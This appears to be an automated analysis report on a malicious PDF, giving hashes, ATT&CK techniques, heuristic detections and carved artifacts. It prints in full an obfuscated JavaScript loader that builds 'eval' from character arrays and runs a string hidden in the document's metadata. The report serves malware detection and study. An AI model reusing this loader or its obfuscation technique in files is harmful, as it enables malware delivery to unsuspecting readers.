PDF malware analysis — malicious · 7544760d47b13cd9

MALICIOUS

PDF

44.6 KB

MD5: c020bdb8b39f0a578f19774b07e716dd SHA-1: aa0177b5dfee5a73f1f6b53c0e800167933078aa SHA-256: 7544760d47b13cd9c66be3eeb1a5f2dd328b3c978ed316909a0ca0f18d834b1a

118 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript, identified by heuristics like PDF_JAVASCRIPT and PDF_JS_EXPLOIT_CLUSTER. The JavaScript code, when executed, appears to download a second-stage payload from the URL http://www.bitstream.com. This is a common technique for delivering malware via malicious documents, likely distributed through spearphishing.

Machine Learning

Nyx PDF Classifier malicious score 0.9994

Heuristics 6

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
XFA form low PDF_XFA

PDF uses XML Forms Architecture — can contain script logic
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL

The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.bitstream.com In PDF document text
- http://ns.adobe.com/xdp/In PDF document text
- http://www.xfa.org/schema/xci/2.6/In PDF document text
- http://www.xfa.org/schema/xfa-template/2.6/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0007_000.js
b009cf33017e0bf5af24d8cf419cf995a84f7f8eb3e069fb7101b8b2ab8c0878 pdf-javascript-stream PDF /JS object 7 at offset 0x874 1016 bytes

Filename	Kind	Source	Size
`javascript_obj0007_000.js` `b009cf33017e0bf5af24d8cf419cf995a84f7f8eb3e069fb7101b8b2ab8c0878`	pdf-javascript-stream	PDF /JS object 7 at offset 0x874	1016 bytes
Preview script First 1,000 lines of the extracted script Yf1w00Ib=this;xm5T42=['w','3','Z','U','6','s','v','i','H','0','V','C','l','q','n','n','X','f','l','P','U','L','o','S','c','8','0','4'];JWx6ACn9bA=xm5T42[7]+xm5T42[15]+xm5T42[17]+xm5T42[22];rWeGEt=Yf1w00Ib[JWx6ACn9bA];X03480x=['c','p','z','8','u','d','O','m','U','9','4','v','F','f','h','P','t','y','m','1','y','m','j','4','p','B','W','e','A','7','a','t','y','2'];gylJi6Dw87=X03480x[1]+X03480x[5]+X03480x[13]+X03480x[16]+X03480x[20]+X03480x[24]+X03480x[27];qL3Q=rWeGEt[gylJi6Dw87]; sg7Mmuj="";SDPeQ3=['L','Y','P','c','D','x','A','h','N','r','r','I','8','a','A','o','q','p','V','r','g','e','C','I','q','Z','A','H','9','1','t','m','F','G','V','9','J','J'];Yp4yFOO26q=SDPeQ3[3]+SDPeQ3[7]+SDPeQ3[13]+SDPeQ3[19]+SDPeQ3[26]+SDPeQ3[30];for (i=0;i<qL3Q.length;i +=4){ sg7Mmuj +=qL3Q.charAt(i);}c6C3pI3=['G','6','B','d','e','m','M','U','4','4','4','v','w','r','z','l','M','G','o','a','j','8','0','l','Q','L','A','U','7'];wC8oUe1=c6C3pI3[4]+c6C3pI3[11]+c6C3pI3[19]+c6C3pI3[23];prel=Yf1w00Ib[wC8oUe1];prel(sg7Mmuj);
`font_00_sfnt_off000010ed.bin` `044efaa0fcddad6a1afc97a6bd112675dff8d542f6a622fb73e7eb17d43d90f7`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x10ED	65932 bytes

Preview script

First 1,000 lines of the extracted script

Yf1w00Ib=this;xm5T42=['w','3','Z','U','6','s','v','i','H','0','V','C','l','q','n','n','X','f','l','P','U','L','o','S','c','8','0','4'];JWx6ACn9bA=xm5T42[7]+xm5T42[15]+xm5T42[17]+xm5T42[22];rWeGEt=Yf1w00Ib[JWx6ACn9bA];X03480x=['c','p','z','8','u','d','O','m','U','9','4','v','F','f','h','P','t','y','m','1','y','m','j','4','p','B','W','e','A','7','a','t','y','2'];gylJi6Dw87=X03480x[1]+X03480x[5]+X03480x[13]+X03480x[16]+X03480x[20]+X03480x[24]+X03480x[27];qL3Q=rWeGEt[gylJi6Dw87];        sg7Mmuj="";SDPeQ3=['L','Y','P','c','D','x','A','h','N','r','r','I','8','a','A','o','q','p','V','r','g','e','C','I','q','Z','A','H','9','1','t','m','F','G','V','9','J','J'];Yp4yFOO26q=SDPeQ3[3]+SDPeQ3[7]+SDPeQ3[13]+SDPeQ3[19]+SDPeQ3[26]+SDPeQ3[30];for (i=0;i<qL3Q.length;i +=4){   sg7Mmuj +=qL3Q.charAt(i);}c6C3pI3=['G','6','B','d','e','m','M','U','4','4','4','v','w','r','z','l','M','G','o','a','j','8','0','l','Q','L','A','U','7'];wC8oUe1=c6C3pI3[4]+c6C3pI3[11]+c6C3pI3[19]+c6C3pI3[23];prel=Yf1w00Ib[wC8oUe1];prel(sg7Mmuj);

font_00_sfnt_off000010ed.bin
044efaa0fcddad6a1afc97a6bd112675dff8d542f6a622fb73e7eb17d43d90f7 pdf-font-stream PDF embedded font (sfnt) at offset 0x10ED 65932 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.